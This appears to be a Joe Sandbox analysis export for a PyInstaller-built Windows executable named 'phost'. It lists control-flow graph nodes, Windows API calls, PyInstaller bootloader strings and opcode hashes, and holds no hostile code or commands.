7ff62cc8bc0e 8882 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8880->8882 8898 7ff62cc8bc1d _fread_nolock _get_daylight 8881->8898 8884 7ff62cc8bc15 8882->8884 8883 7ff62cc8bd8e 8885 7ff62cc8bd93 ReadFile 8883->8885 8892 7ff62cc8c2f4 _fread_nolock 3 API calls 8884->8892 8884->8898 8888 7ff62cc8bdb9 8885->8888 8889 7ff62cc8bead GetLastError 8885->8889 8886 7ff62cc8bd21 GetConsoleMode 8886->8883 8890 7ff62cc8bd35 8886->8890 8887 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8887->8869 8888->8889 8891 7ff62cc8bd82 8888->8891 8889->8898 8890->8885 8893 7ff62cc8bd3f ReadConsoleW 8890->8893 8896 7ff62cc8bdf2 8891->8896 8891->8898 8892->8895 8893->8891 8894 7ff62cc8bd63 GetLastError 8893->8894 8894->8898 8895->8883 8895->8886 8915 7ff62cc8b6e4 8896->8915 8898->8887 8900 7ff62cc8bf39 _get_daylight 8899->8900 8902 7ff62cc8bf64 8899->8902 8901 7ff62cc8bf3e _invalid_parameter_noinfo 8900->8901 8906 7ff62cc8bf49 8901->8906 8903 7ff62cc8bfa0 8902->8903 8902->8906 8930 7ff62cc939ec 8902->8930 8935 7ff62cc8b9ac 8903->8935 8906->8866 8909 7ff62cc8d6b5 _get_daylight 8907->8909 8910 7ff62cc8d67b _fread_nolock 8907->8910 8908 7ff62cc8d69e HeapAlloc 8908->8909 8908->8910 8909->8877 8910->8908 8910->8909 8912 7ff62cc8a9bd RtlFreeHeap 8911->8912 8914 7ff62cc8a9e5 Concurrency::details::SchedulerProxy::DeleteThis _get_daylight 8911->8914 8913 7ff62cc8a9d8 GetLastError 8912->8913 8912->8914 8913->8914 8914->8880 8917 7ff62cc8b72d 8915->8917 8916 7ff62cc8b79c ReadFile 8920 7ff62cc8b7bc 8916->8920 8922 7ff62cc8b797 8916->8922 8917->8916 8917->8922 8920->8922 8923 7ff62cc8c2f4 _fread_nolock 3 API calls 8920->8923 8924 7ff62cc8b853 _fread_nolock _get_daylight 8922->8924 8925 7ff62cc8b880 8922->8925 8926 7ff62cc8c2f4 _fread_nolock 3 API calls 8922->8926 8923->8922 8924->8898 8927 7ff62cc8f910 8925->8927 8926->8925 8928 7ff62cc8f919 MultiByteToWideChar 8927->8928 8944 7ff62cc8ec08 8930->8944 8932 7ff62cc93a10 8933 7ff62cc8a9b8 
Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8932->8933 8934 7ff62cc93a1b 8933->8934 8934->8903 8937 7ff62cc8ba06 8935->8937 8938 7ff62cc8b9d6 _fread_nolock _get_daylight 8935->8938 8936 7ff62cc8ba1f _fread_nolock _get_daylight 8940 7ff62cc8ba32 _invalid_parameter_noinfo 8936->8940 8937->8936 8939 7ff62cc8ba7b 8937->8939 8938->8906 8941 7ff62cc8bacc _fread_nolock 16 API calls 8939->8941 8942 7ff62cc8ba98 _fread_nolock _get_daylight 8939->8942 8940->8938 8941->8942 8948 7ff62cc88568 LeaveCriticalSection 8942->8948 8945 7ff62cc8ec19 _fread_nolock 8944->8945 8946 7ff62cc8ec4e HeapAlloc 8945->8946 8947 7ff62cc8ec68 _get_daylight 8945->8947 8946->8945 8946->8947 8947->8932 8950 7ff62cc7262f 8949->8950 8951 7ff62cc72683 MessageBoxA 8950->8951 8952 7ff62cc7266f MessageBoxW 8950->8952 8953 7ff62cc72690 8951->8953 8952->8953 8954 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8953->8954 8955 7ff62cc726a0 8954->8955 8955->8802 8957 7ff62cc76365 8956->8957 8958 7ff62cc763aa 8957->8958 8960 7ff62cc763cd 8957->8960 8959 7ff62cc72710 9 API calls 8958->8959 8978 7ff62cc763c3 8959->8978 8961 7ff62cc76403 8960->8961 8962 7ff62cc72710 9 API calls 8960->8962 9020 7ff62cc74550 8961->9020 8962->8961 8964 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8966 7ff62cc7336e 8964->8966 8966->8683 8979 7ff62cc764f0 8966->8979 8967 7ff62cc79070 LoadLibraryExW 8968 7ff62cc7641b 8967->8968 8969 7ff62cc76459 8968->8969 8970 7ff62cc76439 8968->8970 9024 7ff62cc79070 8969->9024 8971 7ff62cc72710 9 API calls 8970->8971 8971->8978 8973 7ff62cc76466 8974 7ff62cc76472 8973->8974 8975 7ff62cc764b1 8973->8975 8977 7ff62cc7648a GetLastError 8974->8977 9028 7ff62cc75820 GetProcAddress 8975->9028 8977->8978 8978->8964 8980 7ff62cc76516 8979->8980 8981 7ff62cc7651e 8980->8981 8982 7ff62cc7652f 8980->8982 8984 7ff62cc72710 9 API calls 8981->8984 9116 7ff62cc74c80 8982->9116 9010 7ff62cc7652a 8984->9010 8986 7ff62cc7653b 8987 7ff62cc72710 9 API calls 
8986->8987 8987->9010 8988 7ff62cc7654c 8989 7ff62cc7655c 8988->8989 8991 7ff62cc7656d 8988->8991 8990 7ff62cc72710 9 API calls 8989->8990 8990->9010 8992 7ff62cc7658c 8991->8992 8993 7ff62cc7659d 8991->8993 8994 7ff62cc72710 9 API calls 8992->8994 8995 7ff62cc765ac 8993->8995 8996 7ff62cc765bd 8993->8996 8994->9010 8997 7ff62cc72710 9 API calls 8995->8997 9120 7ff62cc74d40 8996->9120 8997->9010 9000 7ff62cc765cc 9002 7ff62cc72710 9 API calls 9000->9002 9001 7ff62cc765dd 9003 7ff62cc765ec 9001->9003 9004 7ff62cc765fd 9001->9004 9002->9010 9005 7ff62cc72710 9 API calls 9003->9005 9006 7ff62cc7660f 9004->9006 9008 7ff62cc76620 9004->9008 9005->9010 9007 7ff62cc72710 9 API calls 9006->9007 9007->9010 9009 7ff62cc72710 9 API calls 9008->9009 9008->9010 9009->9010 9010->8685 9012 7ff62cc76060 9011->9012 9012->9012 9013 7ff62cc76089 9012->9013 9017 7ff62cc760a0 __std_exception_destroy 9012->9017 9014 7ff62cc72710 9 API calls 9013->9014 9015 7ff62cc76095 9014->9015 9015->8683 9018 7ff62cc72710 9 API calls 9017->9018 9019 7ff62cc761ab 9017->9019 9124 7ff62cc71470 9017->9124 9018->9017 9019->8683 9021 7ff62cc7455a 9020->9021 9022 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9021->9022 9023 7ff62cc745a7 9022->9023 9023->8967 9023->8968 9025 7ff62cc79400 9024->9025 9026 7ff62cc79084 LoadLibraryExW 9025->9026 9027 7ff62cc790a3 __std_exception_destroy 9026->9027 9027->8973 9029 7ff62cc75842 GetLastError 9028->9029 9030 7ff62cc7586f GetProcAddress 9028->9030 9033 7ff62cc7584f 9029->9033 9031 7ff62cc7589a GetProcAddress 9030->9031 9032 7ff62cc7588b GetLastError 9030->9032 9034 7ff62cc758b6 GetLastError 9031->9034 9035 7ff62cc758c5 GetProcAddress 9031->9035 9032->9033 9033->8978 9034->9033 9036 7ff62cc758f3 GetProcAddress 9035->9036 9037 7ff62cc758e1 GetLastError 9035->9037 9038 7ff62cc75921 GetProcAddress 9036->9038 9039 7ff62cc7590f GetLastError 9036->9039 9037->9033 9040 7ff62cc7593d GetLastError 9038->9040 9041 7ff62cc7594f GetProcAddress 9038->9041 
9039->9033 9040->9033 9042 7ff62cc7597d GetProcAddress 9041->9042 9043 7ff62cc7596b GetLastError 9041->9043 9044 7ff62cc759ab GetProcAddress 9042->9044 9045 7ff62cc75999 GetLastError 9042->9045 9043->9042 9046 7ff62cc759d9 GetProcAddress 9044->9046 9047 7ff62cc759c7 GetLastError 9044->9047 9045->9044 9048 7ff62cc75a07 GetProcAddress 9046->9048 9049 7ff62cc759f5 GetLastError 9046->9049 9047->9046 9050 7ff62cc75a35 GetProcAddress 9048->9050 9051 7ff62cc75a23 GetLastError 9048->9051 9049->9048 9052 7ff62cc75a63 GetProcAddress 9050->9052 9053 7ff62cc75a51 GetLastError 9050->9053 9051->9050 9054 7ff62cc75a91 GetProcAddress 9052->9054 9055 7ff62cc75a7f GetLastError 9052->9055 9053->9052 9056 7ff62cc75aad GetLastError 9054->9056 9057 7ff62cc75abf GetProcAddress 9054->9057 9055->9054 9056->9057 9058 7ff62cc75aed GetProcAddress 9057->9058 9059 7ff62cc75adb GetLastError 9057->9059 9060 7ff62cc75b1b GetProcAddress 9058->9060 9061 7ff62cc75b09 GetLastError 9058->9061 9059->9058 9062 7ff62cc75b49 GetProcAddress 9060->9062 9063 7ff62cc75b37 GetLastError 9060->9063 9061->9060 9064 7ff62cc75b77 GetProcAddress 9062->9064 9065 7ff62cc75b65 GetLastError 9062->9065 9063->9062 9066 7ff62cc75ba5 GetProcAddress 9064->9066 9067 7ff62cc75b93 GetLastError 9064->9067 9065->9064 9068 7ff62cc75bd3 GetProcAddress 9066->9068 9069 7ff62cc75bc1 GetLastError 9066->9069 9067->9066 9070 7ff62cc75c01 GetProcAddress 9068->9070 9071 7ff62cc75bef GetLastError 9068->9071 9069->9068 9072 7ff62cc75c1d GetLastError 9070->9072 9073 7ff62cc75c2f GetProcAddress 9070->9073 9071->9070 9072->9073 9074 7ff62cc75c5d GetProcAddress 9073->9074 9075 7ff62cc75c4b GetLastError 9073->9075 9076 7ff62cc75c8b GetProcAddress 9074->9076 9077 7ff62cc75c79 GetLastError 9074->9077 9075->9074 9078 7ff62cc75cb9 GetProcAddress 9076->9078 9079 7ff62cc75ca7 GetLastError 9076->9079 9077->9076 9080 7ff62cc75ce7 GetProcAddress 9078->9080 9081 7ff62cc75cd5 GetLastError 9078->9081 9079->9078 9082 7ff62cc75d15 GetProcAddress 9080->9082 9083 
7ff62cc75d03 GetLastError 9080->9083 9081->9080 9084 7ff62cc75d43 GetProcAddress 9082->9084 9085 7ff62cc75d31 GetLastError 9082->9085 9083->9082 9086 7ff62cc75d71 GetProcAddress 9084->9086 9087 7ff62cc75d5f GetLastError 9084->9087 9085->9084 9088 7ff62cc75d8d GetLastError 9086->9088 9089 7ff62cc75d9f GetProcAddress 9086->9089 9087->9086 9088->9089 9090 7ff62cc75dcd GetProcAddress 9089->9090 9091 7ff62cc75dbb GetLastError 9089->9091 9092 7ff62cc75dfb GetProcAddress 9090->9092 9093 7ff62cc75de9 GetLastError 9090->9093 9091->9090 9094 7ff62cc75e29 GetProcAddress 9092->9094 9095 7ff62cc75e17 GetLastError 9092->9095 9093->9092 9096 7ff62cc75e57 GetProcAddress 9094->9096 9097 7ff62cc75e45 GetLastError 9094->9097 9095->9094 9098 7ff62cc75e85 GetProcAddress 9096->9098 9099 7ff62cc75e73 GetLastError 9096->9099 9097->9096 9100 7ff62cc75eb3 GetProcAddress 9098->9100 9101 7ff62cc75ea1 GetLastError 9098->9101 9099->9098 9102 7ff62cc75ee1 GetProcAddress 9100->9102 9103 7ff62cc75ecf GetLastError 9100->9103 9101->9100 9104 7ff62cc75efd GetLastError 9102->9104 9105 7ff62cc75f0f GetProcAddress 9102->9105 9103->9102 9104->9105 9106 7ff62cc75f3d GetProcAddress 9105->9106 9107 7ff62cc75f2b GetLastError 9105->9107 9108 7ff62cc75f6b GetProcAddress 9106->9108 9109 7ff62cc75f59 GetLastError 9106->9109 9107->9106 9110 7ff62cc75f99 GetProcAddress 9108->9110 9111 7ff62cc75f87 GetLastError 9108->9111 9109->9108 9112 7ff62cc75fc7 GetProcAddress 9110->9112 9113 7ff62cc75fb5 GetLastError 9110->9113 9111->9110 9114 7ff62cc75ff5 9112->9114 9115 7ff62cc75fe3 GetLastError 9112->9115 9113->9112 9114->8978 9115->9114 9117 7ff62cc74cb0 9116->9117 9118 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9117->9118 9119 7ff62cc74d1a 9118->9119 9119->8986 9119->8988 9123 7ff62cc74d55 __std_exception_destroy 9120->9123 9121 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9122 7ff62cc74e6e 9121->9122 9122->9000 9122->9001 9123->9121 9125 7ff62cc745b0 40 API calls 9124->9125 
9126 7ff62cc71493 9125->9126 9127 7ff62cc714bc 9126->9127 9128 7ff62cc7149b 9126->9128 9130 7ff62cc80744 7 API calls 9127->9130 9129 7ff62cc72710 9 API calls 9128->9129 9131 7ff62cc714ab 9129->9131 9132 7ff62cc714d1 9130->9132 9131->9017 9133 7ff62cc714f8 9132->9133 9134 7ff62cc714d5 _get_daylight 9132->9134 9136 7ff62cc71508 _get_daylight 9133->9136 9137 7ff62cc71532 9133->9137 9135 7ff62cc72910 9 API calls 9134->9135 9142 7ff62cc714f3 __std_exception_destroy 9135->9142 9140 7ff62cc72910 9 API calls 9136->9140 9138 7ff62cc71538 9137->9138 9145 7ff62cc7154b 9137->9145 9148 7ff62cc71210 9138->9148 9140->9142 9141 7ff62cc800bc 11 API calls 9144 7ff62cc715c4 9141->9144 9142->9141 9143 7ff62cc8040c _fread_nolock 23 API calls 9143->9145 9144->9017 9145->9142 9145->9143 9146 7ff62cc715d6 _get_daylight 9145->9146 9147 7ff62cc72910 9 API calls 9146->9147 9147->9142 9149 7ff62cc71268 9148->9149 9150 7ff62cc71297 9149->9150 9151 7ff62cc7126f 9149->9151 9154 7ff62cc712d4 9150->9154 9155 7ff62cc712b1 _get_daylight 9150->9155 9152 7ff62cc72710 9 API calls 9151->9152 9153 7ff62cc71282 9152->9153 9153->9142 9157 7ff62cc712e6 _get_daylight 9154->9157 9163 7ff62cc71309 _fread_nolock 9154->9163 9156 7ff62cc72910 9 API calls 9155->9156 9160 7ff62cc712cf __std_exception_destroy 9156->9160 9159 7ff62cc72910 9 API calls 9157->9159 9158 7ff62cc8040c _fread_nolock 23 API calls 9158->9163 9159->9160 9160->9142 9161 7ff62cc713cf 9162 7ff62cc72710 9 API calls 9161->9162 9162->9160 9163->9158 9163->9160 9163->9161 9165 7ff62cc85f38 9164->9165 9166 7ff62cc85f5e _get_daylight 9165->9166 9168 7ff62cc85f91 9165->9168 9167 7ff62cc85f63 _invalid_parameter_noinfo 9166->9167 9170 7ff62cc85f6e _get_daylight 9167->9170 9168->9170 9171 7ff62cc8ff3c 9168->9171 9170->8690 9172 7ff62cc8ff62 9171->9172 9174 7ff62cc8ff96 9172->9174 9175 7ff62cc96dc4 9172->9175 9174->9170 9178 7ff62cc963c4 9175->9178 9179 7ff62cc963f9 9178->9179 9180 7ff62cc963db _get_daylight 9178->9180 9179->9180 9181 7ff62cc96415 
9179->9181 9182 7ff62cc963e0 _invalid_parameter_noinfo 9180->9182 9187 7ff62cc969d4 9181->9187 9184 7ff62cc963ee 9182->9184 9184->9174 9185 7ff62cc96440 9185->9184 9209 7ff62cc88568 LeaveCriticalSection 9185->9209 9210 7ff62cc96708 9187->9210 9189 7ff62cc96a1b 9198 7ff62cc96a49 _fread_nolock _get_daylight 9189->9198 9218 7ff62cc88590 9189->9218 9191 7ff62cc96a66 9192 7ff62cc96a86 CreateFileW 9191->9192 9191->9198 9193 7ff62cc96af1 9192->9193 9194 7ff62cc96b6c GetFileType 9192->9194 9196 7ff62cc96b39 GetLastError 9193->9196 9199 7ff62cc96aff CreateFileW 9193->9199 9195 7ff62cc96b79 GetLastError 9194->9195 9202 7ff62cc96bca 9194->9202 9223 7ff62cc84eec 9195->9223 9196->9198 9198->9185 9199->9194 9199->9196 9200 7ff62cc96b88 CloseHandle 9200->9198 9201 7ff62cc96bba _get_daylight 9200->9201 9201->9198 9204 7ff62cc96c40 9202->9204 9225 7ff62cc96910 9202->9225 9204->9198 9205 7ff62cc96d0c CloseHandle CreateFileW 9204->9205 9205->9201 9206 7ff62cc96d53 GetLastError 9205->9206 9207 7ff62cc96d60 _fread_nolock 9206->9207 9233 7ff62cc886d0 9207->9233 9211 7ff62cc96734 _get_daylight 9210->9211 9212 7ff62cc96752 _get_daylight 9210->9212 9211->9212 9213 7ff62cc96743 _invalid_parameter_noinfo 9211->9213 9215 7ff62cc967d0 _get_daylight 9212->9215 9217 7ff62cc967c1 _invalid_parameter_noinfo 9212->9217 9213->9212 9214 7ff62cc9681f 9214->9189 9215->9214 9216 7ff62cc96812 _invalid_parameter_noinfo 9215->9216 9216->9214 9217->9215 9219 7ff62cc885b3 9218->9219 9220 7ff62cc885dc 9219->9220 9221 7ff62cc88632 EnterCriticalSection 9219->9221 9220->9191 9221->9220 9222 7ff62cc88641 LeaveCriticalSection 9221->9222 9222->9219 9224 7ff62cc84ef9 Concurrency::details::SchedulerProxy::DeleteThis 9223->9224 9224->9200 9226 7ff62cc96947 9225->9226 9229 7ff62cc96965 _fread_nolock _get_daylight 9225->9229 9227 7ff62cc8c2f4 _fread_nolock 3 API calls 9226->9227 9226->9229 9228 7ff62cc9695c 9227->9228 9228->9229 9230 7ff62cc8bacc _fread_nolock 16 API calls 9228->9230 9229->9204 9232 7ff62cc96992 
9230->9232 9231 7ff62cc8c2f4 _fread_nolock 3 API calls 9231->9229 9232->9229 9232->9231 9234 7ff62cc886ec 9233->9234 9235 7ff62cc88750 _fread_nolock _get_daylight 9233->9235 9234->9235 9236 7ff62cc88748 SetStdHandle 9234->9236 9235->9201 9236->9235 9238 7ff62cc87968 9237->9238 9241 7ff62cc87444 9238->9241 9240 7ff62cc87981 9240->8701 9242 7ff62cc8745f 9241->9242 9243 7ff62cc8748e 9241->9243 9244 7ff62cc8a884 4 API calls 9242->9244 9247 7ff62cc874b0 9243->9247 9245 7ff62cc8747f 9244->9245 9245->9240 9248 7ff62cc874cb 9247->9248 9251 7ff62cc874f4 9247->9251 9249 7ff62cc8a884 4 API calls 9248->9249 9250 7ff62cc874eb 9249->9250 9250->9245 9251->9250 9252 7ff62cc87576 9251->9252 9255 7ff62cc8775c 9252->9255 9256 7ff62cc87776 9255->9256 9258 7ff62cc8780d ReadFile 9256->9258 9260 7ff62cc877a3 9256->9260 9257 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9259 7ff62cc87584 9257->9259 9258->9260 9259->9250 9260->9257 9262 7ff62cc7feb3 9261->9262 9265 7ff62cc7fee1 9261->9265 9263 7ff62cc8a884 4 API calls 9262->9263 9264 7ff62cc7fed3 9263->9264 9264->8705 9265->9264 9267 7ff62cc7ff14 9265->9267 9268 7ff62cc7ff2f 9267->9268 9271 7ff62cc7ff54 9267->9271 9269 7ff62cc8a884 4 API calls 9268->9269 9270 7ff62cc7ff4f 9269->9270 9270->9264 9271->9270 9277 7ff62cc8adf8 9271->9277 9273 7ff62cc7ff71 9281 7ff62cc8aa6c 9273->9281 9276 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9276->9270 9278 7ff62cc8ae20 9277->9278 9279 7ff62cc8ae0c 9277->9279 9278->9273 9279->9278 9280 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9279->9280 9280->9278 9282 7ff62cc8aa98 9281->9282 9287 7ff62cc7ff83 9281->9287 9283 7ff62cc8aafc 9282->9283 9285 7ff62cc8aac8 9282->9285 9284 7ff62cc8a884 4 API calls 9283->9284 9284->9287 9288 7ff62cc8a9f4 9285->9288 9287->9270 9287->9276 9289 7ff62cc8aa10 9288->9289 9290 7ff62cc8aa45 9289->9290 9294 7ff62cc8abc8 9289->9294 9307 7ff62cc88568 LeaveCriticalSection 9290->9307 9295 7ff62cc8878c 
_fread_nolock _invalid_parameter_noinfo 9294->9295 9297 7ff62cc8abe4 9295->9297 9296 7ff62cc8abea 9299 7ff62cc886d0 SetStdHandle 9296->9299 9297->9296 9298 7ff62cc8ac27 9297->9298 9300 7ff62cc8878c _fread_nolock _invalid_parameter_noinfo 9297->9300 9298->9296 9301 7ff62cc8878c _fread_nolock _invalid_parameter_noinfo 9298->9301 9306 7ff62cc8ac4f _fread_nolock 9299->9306 9302 7ff62cc8ac1a 9300->9302 9303 7ff62cc8ac33 CloseHandle 9301->9303 9304 7ff62cc8878c _fread_nolock _invalid_parameter_noinfo 9302->9304 9303->9296 9305 7ff62cc8ac40 GetLastError 9303->9305 9304->9298 9305->9296 9306->9290 9309 7ff62cc78823 __std_exception_destroy 9308->9309 9310 7ff62cc787a1 GetTokenInformation 9308->9310 9313 7ff62cc7883c 9309->9313 9314 7ff62cc78836 CloseHandle 9309->9314 9311 7ff62cc787cd 9310->9311 9312 7ff62cc787c2 GetLastError 9310->9312 9311->9309 9315 7ff62cc787e9 GetTokenInformation 9311->9315 9312->9309 9312->9311 9313->8718 9314->9313 9315->9309 9316 7ff62cc7880c 9315->9316 9316->9309 9317 7ff62cc78816 ConvertSidToStringSidW 9316->9317 9317->9309 9320 7ff62cc71865 9319->9320 9322 7ff62cc718d5 9319->9322 9320->9322 9367 7ff62cc85094 9320->9367 9322->8754 9324 7ff62cc77e1e 9323->9324 9327 7ff62cc77f42 9324->9327 9328 7ff62cc74550 6 API calls 9324->9328 9329 7ff62cc77f13 CreateDirectoryW 9324->9329 9325 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9326 7ff62cc77f73 9325->9326 9326->8754 9327->9325 9328->9324 9329->9324 9329->9327 9331 7ff62cc71637 9330->9331 9332 7ff62cc71613 9330->9332 9334 7ff62cc745b0 40 API calls 9331->9334 9374 7ff62cc71050 9332->9374 9336 7ff62cc7164b 9334->9336 9335 7ff62cc71618 9337 7ff62cc7162e 9335->9337 9341 7ff62cc72710 9 API calls 9335->9341 9338 7ff62cc71682 9336->9338 9339 7ff62cc71653 _get_daylight 9336->9339 9337->8754 9340 7ff62cc745b0 40 API calls 9338->9340 9345 7ff62cc72910 9 API calls 9339->9345 9342 7ff62cc71696 9340->9342 9341->9337 9343 7ff62cc716b8 9342->9343 9344 7ff62cc7169e 9342->9344 9347 7ff62cc80744 7 

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
• Instruction ID: d91159f3654b64ad46d2a51dc8f32fd18666e8e3e401ee22508fd9f32b87e453
• Opcode Fuzzy Hash: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
• Instruction Fuzzy Hash: 6E32AE21F4C68291FF25DB29DD552B92279EF447A4F884032DA4DCB2C6EF2CE559E302

Control-flow Graph

control_flow_graph 465 7ff62cc969d4-7ff62cc96a47 call 7ff62cc96708 468 7ff62cc96a61-7ff62cc96a6b call 7ff62cc88590 465->468 469 7ff62cc96a49-7ff62cc96a52 call 7ff62cc84f58 465->469 475 7ff62cc96a86-7ff62cc96aef CreateFileW 468->475 476 7ff62cc96a6d-7ff62cc96a84 call 7ff62cc84f58 call 7ff62cc84f78 468->476 474 7ff62cc96a55-7ff62cc96a5c call 7ff62cc84f78 469->474 488 7ff62cc96da2-7ff62cc96dc2 474->488 479 7ff62cc96af1-7ff62cc96af7 475->479 480 7ff62cc96b6c-7ff62cc96b77 GetFileType 475->480 476->474 485 7ff62cc96b39-7ff62cc96b67 GetLastError call 7ff62cc84eec 479->485 486 7ff62cc96af9-7ff62cc96afd 479->486 482 7ff62cc96b79-7ff62cc96bb4 GetLastError call 7ff62cc84eec CloseHandle 480->482 483 7ff62cc96bca-7ff62cc96bd1 480->483 482->474 499 7ff62cc96bba-7ff62cc96bc5 call 7ff62cc84f78 482->499 491 7ff62cc96bd3-7ff62cc96bd7 483->491 492 7ff62cc96bd9-7ff62cc96bdc 483->492 485->474 486->485 493 7ff62cc96aff-7ff62cc96b37 CreateFileW 486->493 497 7ff62cc96be2-7ff62cc96c37 call 7ff62cc884a8 491->497 492->497 498 7ff62cc96bde 492->498 493->480 493->485 503 7ff62cc96c56-7ff62cc96c87 call 7ff62cc96488 497->503 504 7ff62cc96c39-7ff62cc96c45 call 7ff62cc96910 497->504 498->497 499->474 511 7ff62cc96c89-7ff62cc96c8b 503->511 512 7ff62cc96c8d-7ff62cc96ccf 503->512 504->503 510 7ff62cc96c47 504->510 513 7ff62cc96c49-7ff62cc96c51 call 7ff62cc8ab30 510->513 511->513 514 7ff62cc96cf1-7ff62cc96cfc 512->514 515 7ff62cc96cd1-7ff62cc96cd5 512->515 513->488 516 7ff62cc96da0 514->516 517 7ff62cc96d02-7ff62cc96d06 514->517 515->514 519 7ff62cc96cd7-7ff62cc96cec 515->519 516->488 517->516 520 7ff62cc96d0c-7ff62cc96d51 CloseHandle CreateFileW 517->520 519->514 522 7ff62cc96d53-7ff62cc96d81 GetLastError call 7ff62cc84eec call 7ff62cc886d0 520->522 523 7ff62cc96d86-7ff62cc96d9b 520->523 522->523 523->516
APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: 7df44e4102c86179fbd9d14821d3b9baefb01ab3e15938cec973a855de33fc49
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: 46C1AF36B28A8186EF50DFA9C8906BD3771EB49BA8B019225DE2E977D4DF38D451C301
APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: f948e57ca8638abdaf421297596fcdd9006840ea5b7e6967280019a7dc4aee91
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: 88F0493271864286FF708B64B8597766370EB88778F084235D96D45AD4DF3CD05DD601

Control-flow Graph

